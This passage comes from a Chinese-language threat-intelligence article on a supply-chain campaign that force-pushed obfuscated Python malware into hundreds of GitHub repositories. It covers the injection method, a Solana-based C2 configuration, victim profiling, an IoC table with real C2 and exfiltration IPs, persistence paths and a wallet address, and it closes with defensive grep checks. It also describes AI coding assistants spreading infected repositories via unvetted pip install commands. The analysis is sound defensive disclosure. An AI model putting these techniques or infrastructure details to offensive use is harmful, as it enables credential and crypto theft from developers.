8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">返回的结果，让我们瞬间沉默。<img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.6509259259259259" data-s="300,640" data-type="png" data-w="1080" style="display: block;max-width: 100%;margin: 0.5em auto 1em;border-radius: 4px;box-shadow: rgba(0, 0, 0, 0.12) 0px 2px 12px;height: auto !important;" data-croporisrc="https://mmbiz.qpic.cn/sz_mmbiz_png/jHUbrwW0VwWzjLUia1g5pS81icVrxLwB0C4TOHtIPGbEQr4TEKu5JjV4oDjkIacRoW8WbNo9YcR8uNrKwQNJQewMS1hr3CoTqqtZjXctkRmibs/0?wx_fmt=png&amp;from=appmsg" data-cropselx2="530" data-cropsely2="345" data-imgfileid="100027815" src="https://wechat2rss.xlab.app/img-proxy/?k=eecb94cd&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FjHUbrwW0VwWzjLUia1g5pS81icVrxLwB0C4TOHtIPGbEQr4TEKu5JjV4oDjkIacRoW8WbNo9YcR8uNrKwQNJQewMS1hr3CoTqqtZjXctkRmibs%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></p><p data-line="259" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">数百个仓库的 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">app.py</span></code><span leaf=""> 或 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">setup.py</span></code><span leaf=""> 中，赫然包含着完全相同的 Base64 毒代码。横跨了数百个不同的 GitHub 开发者账户，涵盖了 Django 项目、机器学习研究代码、Flask API 乃至各种 PyPI 辅助包。</span></p><p data-line="261" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">这不是个案，这是一场有组织的血洗。</span></p><p data-line="263" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">我们分析了这些被感染的仓库（如 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">amirasaran/django-restful-admin</span></code><span leaf="">），发现了攻击者注入代码的手法：</span><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">Force-Push（强制推送）</span></strong><span leaf="">。</span></p><p data-line="265" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">攻击者利用窃取来的合法开发者 GitHub Token，在本地修改代码后，使用 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">--force</span></code><span leaf=""> 选项直接覆盖远程仓库的历史。为了掩人耳目，他们篡改了 Git 的 Author Date（作者提交时间）以伪装成过去的正常提交。但他们自动化工具链的疏忽，留下了无法抹除的指纹——Committer Date（提交者时间）与 Author Date 往往相差几个月甚至数年；且 Committer 的邮箱，被统一设置为了字符串 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">&#34;null&#34;</span></code><span leaf="">。</span></p><figure data-line="267" style="margin: 1.5em 8px;color: rgb(51, 51, 51);"><span leaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.5907407407407408" data-s="300,640" data-type="png" data-w="1080" style="display: block;max-width: 100%;margin: 0.5em auto 1em;border-radius: 4px;box-shadow: rgba(0, 0, 0, 0.12) 0px 2px 12px;height: auto !important;" data-croporisrc="https://mmbiz.qpic.cn/mmbiz_png/jHUbrwW0VwUlac5YxlWpyAiaOFFAhWLyoWyc4PRpluj3JnpGiaicicBwiaKTdibx7LHiaGkrEXx23fJZeic2cTaeaX1kibkfUQq73O8SiarlgRvykWKy8/0?wx_fmt=png&amp;from=appmsg" data-cropselx2="530" data-cropsely2="313" data-imgfileid="100027816" src="https://wechat2rss.xlab.app/img-proxy/?k=05beac31&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FjHUbrwW0VwUlac5YxlWpyAiaOFFAhWLyoWyc4PRpluj3JnpGiaicicBwiaKTdibx7LHiaGkrEXx23fJZeic2cTaeaX1kibkfUQq73O8SiarlgRvykWKy8%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span><figcaption style="text-align: center;color: rgb(136, 136, 136);font-size: 0.8em;"><span leaf="">被插入恶意代码文件的commit记录</span></figcaption></figure><h3 data-line="269" style="padding-left: 12px;border-left: 4px solid rgb(0, 82, 217);border-bottom: 1px dashed rgb(0, 82, 217);margin: 2em 8px 0.75em 0px;color: rgb(51, 51, 51);font-size: calc(19.2px);font-weight: bold;line-height: 1.2;"><span leaf="">Vibe Coding 场景：AI 工具成为传播加速器</span></h3><p data-line="271" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">当我们复盘这些受感染的仓库是如何造成二次传播时，我们发现了 AI 时代供应链攻击的另一个致命推手。</span></p><p data-line="273" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">在遇到某个缺少文档的开源库时，现今的开发者往往会直接问 Cursor 或 Claude：“帮我写个脚本引入这个功能，并告诉我怎么安装。” 为了“方便”，AI 助手经常会跳过官方包管理器的复杂校验，直接生成如下指令： </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">pip install git+<a href="https://github.com/amirasaran/django-restful-admin.git" target="_blank">https://github.com/amirasaran/django-restful-admin.git</a></span></code></p><p data-line="277" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">开发者习惯性地复制、粘贴、回车。没有代码审查，没有安全警告，被污染的代码借由 AI 工具的“便利性”，顺理成章地跑在了更多开发者的电脑上。</span></p><p data-line="279" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">这构成了这场供应链蠕虫攻击的完美闭环：</span></p><figure data-line="281" style="margin: 1.5em 8px;color: rgb(51, 51, 51);"><span leaf=""><img data-aistatus="1" alt="Github污染项目传播机制" class="rich_pages wxw-img" data-ratio="0.5583333333333333" data-type="png" data-w="1080" style="display: block;max-width: 100%;margin: 0.5em auto 1em;border-radius: 4px;box-shadow: rgba(0, 0, 0, 0.12) 0px 2px 12px;height: auto !important;" data-imgfileid="100027840" src="https://wechat2rss.xlab.app/img-proxy/?k=34bf8233&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FjHUbrwW0VwWFNTYWB9mndXXmKIB1whXVqdlDdkkqIznTKrG2O7YaLrdWd9a6TJPL4kG6XpJOfh6s1UvAg2srxOnyqZVUO9hdMWXdicT8jasw%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span><figcaption style="text-align: center;color: rgb(136, 136, 136);font-size: 0.8em;"><span leaf="">Github污染项目传播机制</span></figcaption></figure><hr style="border-style: solid;border-width: 2px 0px 0px;border-color: rgba(0, 0, 0, 0.1);transform-origin: 0px 0px;transform: scale(1, 0.5);height: 1px;margin: 2em 0px;background: linear-gradient(to right, rgba(0, 0, 0, 0), rgba(0, 0, 0, 0.1), rgba(0, 0, 0, 0));"/><h2 data-line="285" style="display: block;width: fit-content;padding: 0.3em 1.2em;margin: 2.5em auto 1.5em;color: rgb(255, 255, 255);background: rgb(0, 82, 217);font-size: calc(19.2px);font-weight: bold;text-align: center;border-radius: 6px;box-shadow: none;"><span leaf="">5. 关联外部报告：我们的发现与行业情报高度吻合</span></h2><p data-line="287" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">随着溯源的深入，我们将此次攻击关联到了近期安全社区密切追踪的 </span><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">GlassWorm / ForceMemo</span></strong><span leaf=""> 恶意活动。我们独立分析的样本特征，与 StepSecurity、Aikido 等安全机构披露的情报在技术细节上高度吻合，这也从宏观侧面印证了这场猎杀行动的庞大规模。</span></p><p data-line="289" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">时间线还原：</span></strong></p><ul style="list-style-type: disc;padding-left: 1.5em;margin-left: 0px;color: rgb(51, 51, 51);" class="list-paddingleft-1"><li style="display: list-item;margin: 0.5em 8px;color: rgb(51, 51, 51);letter-spacing: 0.05em;"><p style="letter-spacing: 0.05em;color: rgb(51, 51, 51);margin: 0px;padding: 0px;"><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">2025 年 11 月 - 2026 年 2 月</span></strong><span leaf="">：攻击者在 Solana 链上部署 C2 基础设施，早期主要活跃在 Vultr 托管的服务器上，频繁通过链上 Memo 交易更新下发载荷的 URL。</span></p></li><li style="display: list-item;margin: 0.5em 8px;color: rgb(51, 51, 51);letter-spacing: 0.05em;"><p style="letter-spacing: 0.05em;color: rgb(51, 51, 51);margin: 0px;padding: 0px;"><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">2026 年 3 月初（GlassWorm 爆发）</span></strong><span leaf="">：Aikido 报告指出，大量恶意 VSCode/Cursor 扩展被植入针对开发者的远控木马，成为供应链感染的“零号病人”。</span></p></li><li style="display: list-item;margin: 0.5em 8px;color: rgb(51, 51, 51);letter-spacing: 0.05em;"><p style="letter-spacing: 0.05em;color: rgb(51, 51, 51);margin: 0px;padding: 0px;"><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">2026 年 3 月中（ForceMemo 波次）</span></strong><span leaf="">：正如我们所分析的样本，攻击者利用前期窃取的 Token，通过账号劫持和 Force-Push，批量污染了超过 240+ 个高星 Python 仓库（StepSecurity 披露数据）。</span></p></li></ul><p data-line="294" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">链上暴露的基础设施与极高的 ROI：</span></strong><span leaf=""> 我们通过追踪样本中硬编码的 Solana 钱包地址，还原了其 2026 年 2 月底在链上暴露的完整 C2 配置：</span></p><div style="margin: 10px 8px;border-radius: 8px;border: 1px solid rgb(200, 208, 219);background: rgb(234, 238, 243);overflow: hidden;"><p style="text-align: right;padding: 4px 10px 2px;background: rgb(212, 218, 226);border-bottom: 1px solid rgb(200, 208, 219);"><span style="font-size: 11px;line-height: 1.4;color: rgb(58, 80, 112);font-family: &#34;Fira Code&#34;, Menlo, &#34;Operator Mono&#34;, Consolas, Monaco, monospace;letter-spacing: 0px;"><span leaf="">json</span></span></p><pre style="margin: 0px;border: none;border-radius: 0px;box-shadow: none;background: transparent;font-size: 14.4px;line-height: 1.5;overflow-x: auto;padding: 0px !important;"><code language="json" style="display: block;padding: 0.5em 1em 1em;overflow-x: auto;text-indent: 0px;color: rgb(0, 25, 58);white-space: nowrap;word-break: normal;overflow-wrap: normal;margin: 0px;font-size: inherit;line-height: inherit;border: none;border-radius: 0px;background: transparent !important;"><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(76, 129, 201);"><span leaf="">{</span></span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">&#34;c2server&#34;</span><span style="color: rgb(76, 129, 201);"><span leaf="">:</span></span><span style="color: rgb(0, 72, 171);"><span leaf="">&#34;<a href="http://217.69.11.99:5000" target="_blank">http://217.69.11.99:5000</a>&#34;</span></span><span style="color: rgb(76, 129, 201);"><span leaf="">,</span></span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">&#34;checkIp&#34;</span><span style="color: rgb(76, 129, 201);"><span leaf="">:</span></span><span style="color: rgb(0, 72, 171);"><span leaf="">&#34;<a href="http://217.69.11.99" target="_blank">http://217.69.11.99</a>&#34;</span></span><span style="color: rgb(76, 129, 201);"><span leaf="">,</span></span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">&#34;dht_data&#34;</span><span style="color: rgb(76, 129, 201);"><span leaf="">:</span></span><span style="color: rgb(0, 72, 171);"><span leaf="">&#34;217.69.11.99:10000&#34;</span></span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(76, 129, 201);"><span leaf="">}</span></span></p></code></pre></div><hr style="border-style: solid;border-width: 2px 0px 0px;border-color: rgba(0, 0, 0, 0.1);transform-origin: 0px 0px;transform: scale(1, 0.5);height: 1px;margin: 2em 0px;background: linear-gradient(to right, rgba(0, 0, 0, 0), rgba(0, 0, 0, 0.1), rgba(0, 0, 0, 0));"/><h2 data-line="306" style="display: block;width: fit-content;padding: 0.3em 1.2em;margin: 2.5em auto 1.5em;color: rgb(255, 255, 255);background: rgb(0, 82, 217);font-size: calc(19.2px);font-weight: bold;text-align: center;border-radius: 6px;box-shadow: none;"><span leaf="">6. 受害者画像：这颗子弹，专门为你铸造</span></h2><p data-line="308" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">这场行动影响最近直接的目标，毫无疑问是——</span><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">现代全栈开发者与 AI/Web3 极客</span></strong><span leaf="">。</span></p><ol style="list-style-type: decimal;padding-left: 1.5em;margin-left: 0px;color: rgb(51, 51, 51);" class="list-paddingleft-1"><li style="display: list-item;margin: 0.5em 8px;color: rgb(51, 51, 51);letter-spacing: 0.05em;"><p style="letter-spacing: 0.05em;color: rgb(51, 51, 51);margin: 0px;padding: 0px;"><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">经济价值维度</span></strong><span leaf="">：攻击者深知，在这个时代，程序员群体的电脑是离加密货币最近的地方。同时兼具热钱包（MetaMask）和冷钱包（Ledger/Trezor 桌面端）管理习惯的开发者，是他们眼中的“肥羊”。</span></p></li><li style="display: list-item;margin: 0.5em 8px;color: rgb(51, 51, 51);letter-spacing: 0.05em;"><p style="letter-spacing: 0.05em;color: rgb(51, 51, 51);margin: 0px;padding: 0px;"><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">技术依赖度维度</span></strong><span leaf="">：高度依赖 NPM、GitHub、VSCode 生态。习惯于直接调用开源包，习惯于用命令行管理鉴权 Token。攻击者正是利用了这种技术习惯，将开发者变成了最好的“宿主”和“传播节点”。</span></p></li><li style="display: list-item;margin: 0.5em 8px;color: rgb(51, 51, 51);letter-spacing: 0.05em;"><p style="letter-spacing: 0.05em;color: rgb(51, 51, 51);margin: 0px;padding: 0px;"><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">行业属性维度</span></strong><span leaf="">：Web3 开发者、AI 大模型应用开发者、独立 Hacker——这类人群由于业务需求，往往有着极高的开源社区活跃度，且代码拉取行为频繁，完美落入攻击手法的覆盖范围。</span></p></li></ol><hr style="border-style: solid;border-width: 2px 0px 0px;border-color: rgba(0, 0, 0, 0.1);transform-origin: 0px 0px;transform: scale(1, 0.5);height: 1px;margin: 2em 0px;background: linear-gradient(to right, rgba(0, 0, 0, 0), rgba(0, 0, 0, 0.1), rgba(0, 0, 0, 0));"/><h2 data-line="316" style="display: block;width: fit-content;padding: 0.3em 1.2em;margin: 2.5em auto 1.5em;color: rgb(255, 255, 255);background: rgb(0, 82, 217);font-size: calc(19.2px);font-weight: bold;text-align: center;border-radius: 6px;box-shadow: none;"><span leaf="">7. 威胁指标 (IoCs) 汇总表</span></h2><p style="max-width: 100%;overflow-x: auto;"><table style="border-collapse: separate;border-spacing: 0px;border-radius: 6px;margin: 1em auto;color: rgb(51, 51, 51);box-shadow: none;border: 1px solid rgb(208, 215, 227);width: 2528px;"><thead><tr><th align="left" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(255, 255, 255);background: rgb(0, 82, 217);text-align: left;word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">IoC 类型</span></p></th><th align="left" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(255, 255, 255);background: rgb(0, 82, 217);text-align: left;word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">值 / 描述</span></p></th><th align="left" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(255, 255, 255);background: rgb(0, 82, 217);text-align: left;word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">备注</span></p></th></tr></thead><tbody><tr><td align="left" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);text-align: left;word-break: break-word;overflow-wrap: break-word;"><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">XOR 密钥</span></strong></td><td align="left" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);text-align: left;word-break: break-word;overflow-wrap: break-word;"><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">134</span></code></td><td align="left" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);text-align: left;word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">用于动态还原 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">app.py</span></code><span leaf=""> 混淆载荷</span></p></td></tr><tr><td align="left" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);text-align: left;word-break: break-word;overflow-wrap: break-word;"><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">混淆特征</span></strong></td><td align="left" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);text-align: left;word-break: break-word;overflow-wrap: break-word;"><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">dfhulxliqohxamy</span></code><p><span leaf=""><br/></span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">lzcdrtfxyqiplpd</span></code></p></td><td align="left" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);text-align: left;word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">Python 代码中固定的随机变量名</span></p></td></tr><tr><td align="left" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);text-align: left;word-break: break-word;overflow-wrap: break-word;"><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">加密货币地址</span></strong></td><td align="left" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);text-align: left;word-break: break-word;overflow-wrap: break-word;"><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">BjVeAjPrSKFiingBn4vZvghsGj9KCE8AJVtbc9S8o8SC</span></code></td><td align="left" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);text-align: left;word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">硬编码的 Solana 钱包（C2 指令源）</span></p></td></tr><tr><td align="left" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);text-align: left;word-break: break-word;overflow-wrap: break-word;"><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">文件路径</span></strong></td><td align="left" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);text-align: left;word-break: break-word;overflow-wrap: break-word;"><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">~/init.json</span></code><p><span leaf=""> / </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">%USERPROFILE%\init.json</span></code></p></td><td align="left" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);text-align: left;word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">频率控制标记文件（两天冷却期）</span></p></td></tr><tr><td align="left" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);text-align: left;word-break: break-word;overflow-wrap: break-word;"><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">启动项留存</span></strong></td><td align="left" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);text-align: left;word-break: break-word;overflow-wrap: break-word;"><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">~/Library/LaunchAgents/com.user.nodestart.plist</span></code></td><td align="left" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);text-align: left;word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">macOS 开机自启服务配置文件</span></p></td></tr><tr><td align="left" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);text-align: left;word-break: break-word;overflow-wrap: break-word;"><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">网络请求头</span></strong></td><td align="left" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);text-align: left;word-break: break-word;overflow-wrap: break-word;"><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">os: &lt;platform&gt;</span></code></td><td align="left" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);text-align: left;word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">请求下放载荷时的特异性标头</span></p></td></tr><tr><td align="left" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);text-align: left;word-break: break-word;overflow-wrap: break-word;"><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">网络响应头</span></strong></td><td align="left" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);text-align: left;word-break: break-word;overflow-wrap: break-word;"><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">ivbase64</span></code><p><span leaf=""> &amp; </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">secretkey</span></code></p></td><td align="left" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);text-align: left;word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">用于解密 Stage 2 载荷的 AES 密钥</span></p></td></tr><tr><td align="left" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);text-align: left;word-break: break-word;overflow-wrap: break-word;"><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">C2 外发地址</span></strong></td><td align="left" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);text-align: left;word-break: break-word;overflow-wrap: break-word;"><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">208.76.223.59/p2p</span></code><p><span leaf=""><br/></span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">208.85.20.124/wall</span></code></p></td><td align="left" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);text-align: left;word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">接收 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">/tmp/out.zip</span></code><span leaf=""> 的窃密服务器 IP</span></p></td></tr><tr><td align="left" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);text-align: left;word-break: break-word;overflow-wrap: break-word;"><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">C2 载荷分发</span></strong></td><td align="left" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);text-align: left;word-break: break-word;overflow-wrap: break-word;"><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">217.69.0.159</span></code><p><span leaf=""><br/></span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">45.76.44.240</span></code><span leaf=""><br/></span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">217.69.11.99</span></code></p></td><td align="left" style="border: 1px solid rgb(223, 223, 223);padding: 0.5em 1em;color: rgb(51, 51, 51);text-align: left;word-break: break-word;overflow-wrap: break-word;"><p><span leaf="">载荷及钓鱼钱包（Ledger/Trezor）下载源</span></p></td></tr></tbody></table></p><hr style="border-style: solid;border-width: 2px 0px 0px;border-color: rgba(0, 0, 0, 0.1);transform-origin: 0px 0px;transform: scale(1, 0.5);height: 1px;margin: 2em 0px;background: linear-gradient(to right, rgba(0, 0, 0, 0), rgba(0, 0, 0, 0.1), rgba(0, 0, 0, 0));"/><p data-line="334" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">本次攻击事件影响范围较广，我们呼吁有使用Vibe Coding工具的开发者，请立即在终端执行以下检查：</span></strong></p><div style="margin: 10px 8px;border-radius: 8px;border: 1px solid rgb(200, 208, 219);background: rgb(234, 238, 243);overflow: hidden;"><p style="text-align: right;padding: 4px 10px 2px;background: rgb(212, 218, 226);border-bottom: 1px solid rgb(200, 208, 219);"><span style="font-size: 11px;line-height: 1.4;color: rgb(58, 80, 112);font-family: &#34;Fira Code&#34;, Menlo, &#34;Operator Mono&#34;, Consolas, Monaco, monospace;letter-spacing: 0px;"><span leaf="">bash</span></span></p><pre style="margin: 0px;border: none;border-radius: 0px;box-shadow: none;background: transparent;font-size: 14.4px;line-height: 1.5;overflow-x: auto;padding: 0px !important;"><code language="bash" style="display: block;padding: 0.5em 1em 1em;overflow-x: auto;text-indent: 0px;color: rgb(0, 25, 58);white-space: nowrap;word-break: normal;overflow-wrap: normal;margin: 0px;font-size: inherit;line-height: inherit;border: none;border-radius: 0px;background: transparent !important;"><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(115, 129, 145);"><span leaf=""># 检查项目目录是否存在恶意标记变量</span></span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">grep -r </span><span style="color: rgb(0, 72, 171);"><span leaf="">&#34;lzcdrtfxyqiplpd&#34;</span></span><span leaf=""> .</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(115, 129, 145);"><span leaf=""># 检查是否有异常的后台 Node.js 安装</span></span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(0, 72, 171);"><span leaf="">ls</span></span><span leaf=""> -la ~/node-v22*</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(115, 129, 145);"><span 